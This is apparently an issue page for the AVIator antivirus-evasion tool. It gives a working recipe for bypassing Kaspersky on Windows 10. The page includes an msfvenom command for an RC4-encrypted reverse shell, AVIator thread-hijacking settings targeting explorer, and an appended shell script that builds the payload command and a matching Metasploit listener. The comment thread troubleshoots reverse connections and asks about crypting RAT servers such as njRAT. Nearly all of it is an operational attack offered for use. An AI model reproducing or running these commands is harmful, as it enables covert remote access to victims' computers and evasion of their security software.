Kaspersky AV bypass Test Case #5
Comments
Thanks for your efforts, it is working well. Do you have any tool like AVIator but for encrypting exe payloads like meterpreter, and also for encrypting malware servers like njRAT and DarkComet? Thanks a lot.
Not yet, but this is something that for sure I am going to implement in the very near future.
My dear, also when I test x64/shell it is working, there is a reverse connection but no meterpreter channel is opened.
Once you use meterpreter, the antivirus will detect it. However, shell won't.
I use x64 shell and it worked, but no channel opens although there is a reverse connection?
Make sure you are selecting the right architecture for your shellcode and for your target OS. As pple7000 said, when you use meterpreter the AV will probably detect it and drop the connection as suspicious; if you use a simple shell payload the bypass works fine. Just press a few enters after the connection is open ;)
Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)
Getting a shell on a Windows 10 machine running fully updated Kaspersky AV.
Target Machine: Windows 10 x64
Create the payload using msfvenom:
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
Use AVIator with the following settings:
Target OS architecture: x64
Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)
Target procedure: explorer (leave the default)
Set up the listener on the attacker machine.
Run the generated exe on the victim machine.
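The test case above and the comments about architecture and "connection but no session" both come down to keeping the stub and the handler consistent. The following POSIX shell script is an added example, not part of the issue or of the AVIator project: it emits the msfvenom command for the test case and writes a matching multi/handler resource file, refusing to build when the shellcode architecture and the target OS architecture disagree. LHOST, LPORT and RC4PASSWORD are the values from the issue; the function names, the `handler.rc` path and the x86 payload variant are assumptions.

```sh
#!/bin/sh
# Added example (not from the issue author or the AVIator project).
# Values below are the ones used in the issue's test case.
LHOST="10.0.2.15"
LPORT="443"
RC4PASSWORD="S3cr3TP4ssw0rd"

# Staged, RC4-wrapped reverse *shell* (not meterpreter), which is the payload
# the thread reports as surviving the AV. $1 is "x64" or "x86"; the x86
# variant is an assumed alternative, the issue only uses x64.
payload_for_arch() {
    case "$1" in
        x64) printf 'windows/x64/shell/reverse_tcp_rc4' ;;
        x86) printf 'windows/shell/reverse_tcp_rc4' ;;
        *)   echo "unknown arch: $1" >&2; return 1 ;;
    esac
}

# Print the msfvenom command line. $1 = shellcode arch, $2 = target OS arch.
# Refuses when they differ: an x86 stub injected into a 64-bit explorer.exe
# (or the reverse) crashes the host process instead of calling back.
msfvenom_cmd() {
    sc_arch="$1"; os_arch="$2"
    if [ "$sc_arch" != "$os_arch" ]; then
        echo "shellcode arch ($sc_arch) must match target OS arch ($os_arch)" >&2
        return 1
    fi
    payload=$(payload_for_arch "$sc_arch") || return 1
    printf 'msfvenom -p %s LHOST=%s LPORT=%s EXITFUNC=thread RC4PASSWORD=%s -f csharp\n' \
        "$payload" "$LHOST" "$LPORT" "$RC4PASSWORD"
}

# Write a msfconsole resource file for the listener. The handler must use the
# same payload and the same RC4PASSWORD as the stub: with a wrong password the
# stager still connects, but the stage it receives decrypts to garbage and no
# session is ever opened. $1 = arch, $2 = output path (e.g. handler.rc).
write_handler_rc() {
    payload=$(payload_for_arch "$1") || return 1
    cat > "$2" <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $LHOST
set LPORT $LPORT
set RC4PASSWORD $RC4PASSWORD
set ExitOnSession false
exploit -j
EOF
}
```

Usage on the attacker box, after sourcing the script: `msfvenom_cmd x64 x64 | sh > payload.cs` produces the C# byte array to paste into AVIator, and `write_handler_rc x64 handler.rc && msfconsole -r handler.rc` starts the matching listener before the exe is run on the victim. The RC4 password and the staged/stageless choice are part of the stub, so they cannot be changed later on the listener side without regenerating the payload.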